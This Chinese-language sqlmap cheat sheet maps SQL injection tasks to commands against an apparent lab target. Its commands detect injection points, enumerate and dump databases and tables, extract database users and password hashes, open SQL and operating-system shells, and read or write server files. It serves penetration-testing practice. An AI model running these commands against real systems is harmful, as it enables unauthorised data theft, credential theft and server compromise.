sqlmap下载官网地址:http://www.sqlmap.org
假设注入地址为:http://192.168.1.100/sqltest/less1/?id=1
判断是否存在注入(当参数大于或等于两个时,url需要加双引号包裹起来) | sqlmap.py -u http://192.168.1.100/sqltest/less1/?id=1 |
判断文本中的请求是否存在注入(注入点为post数据或cookie时可使用该方法) | sqlmap.py -r test/sql.txt(文件路径) |
查看当前用户下的所有数据库 | sqlmap.py -u http://192.168.1.100/sqltest/less1/?id=1 --dbs |
获取数据库中的表名 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" -D 数据库名 --tables |
获取表中的字段名 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" -D 数据库名 -T 表名 --columns |
获取字段内容 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" -D 数据库名 -T 表名 -C 字段名 --dump |
获取数据库的所有用户 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" --users |
获取数据库用户的密码 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" --passwords |
获取当前网站数据库的名称 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" --current-db |
获取当前网站数据库用户名称 | sqlmap.py -u "http://192.168.1.100/sqltest/less1/?id=1" --current-user |
指定探测等级,默认是1 | --level 5 |
判断当前用户是否为管理权限 | --is-dba |
列出数据库管理员角色,仅适用数据库为Oracle的时候) | --roles |
伪造referer头,当--level参数为3或3以上时,会尝试对referer进行注入 | --referer |
运行自定义SQL语句 | --sql-shell |
运行任意操作系统命令 | --os-cmd,--os-shell |
从数据库服务器中读取文件 | --file-read |
上传文件到数据库服务器中 | --file-write --file-dest |